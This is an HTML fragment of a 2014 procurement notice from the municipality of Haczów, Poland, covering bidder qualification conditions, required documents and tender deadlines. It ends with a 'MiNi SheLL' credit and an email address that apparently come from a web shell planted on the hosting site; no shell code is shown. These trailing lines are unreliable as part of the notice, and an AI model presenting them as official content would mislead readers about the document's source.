a)wykaz wykonanych  , a w przypadku świadczeń okresowych lub ciągłych  również  wykonywanych , głównych  dostaw  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, , wraz z podaniem  ich  wartości , przedmiotu, dat  wykonania  i podmiotów na rzecz których  usługi zostały  wykonane  oraz załączeniem dowodów czy  zostały wykonane  lub są wykonywane  należycie.
Dowodami są; poświadczenie , z tym, że w odniesieniu  do  nadal wykonywanych dostaw okresowych  lub ciągłych poświadczenie  powinno  być wydane nie wcześniej  niż na  3 miesiące przed upływem terminu  składania ofert. Jeżeli  z  uzasadnionych przyczyn   o obiektywnym charakterze  wykonawca nie jest  w  stanie  uzyskać poświadczenia, składa oświadczenie.
W przypadku gdy zamawiający jest podmiotem  na rzecz którego  usługi  wskazane  w  wykazie  zostały wcześniej  wykonane, wykonawca nie ma  obowiązku przedkładania  dowodów  wyżej wymienionych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym  do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie  sprzętem adekwatnym do wykonania niniejszego zamówienia.		                         
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy   usług   w celu wykonania zamówienia wraz z informacją o podstawie dysponowania  tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym oraz  osobami zdolnymi do wykonania zamówienia, jeżeli:
a) dysponuje lub dysponował będzie  osobami do wykonania zamówienia 		                         
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek udziału w postępowaniu, jeżeli:a) wykonawca posiada (dysponuje) na rachunku bankowym środkami pieniężnymi (lub posiada zdolność kredytową) 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków   udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:a)informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>homologacja i inne dokumenty dopuszczające do ruchu drogowego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć osób odpowiedzialnych  z ramienia Wykonawcy i Zamawiającego do  koordynowania prowadzonych dostaw z przyczyn  niezależnych zarówno w stosunku do wymienionych w SIWZ i ofercie  ( podnoszących jakość technologiczną), danych adresowych  wykonawcy, terminu wykonania zamówienia w przypadku wystąpienia zdarzeń  losowych lub innych warunków, których nie   można było przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Haczów, 36-213 Haczów nr 573, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2014 godzina 09:00, miejsce: Urząd Gminy Haczów, 36-213 Haczów nr 573, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com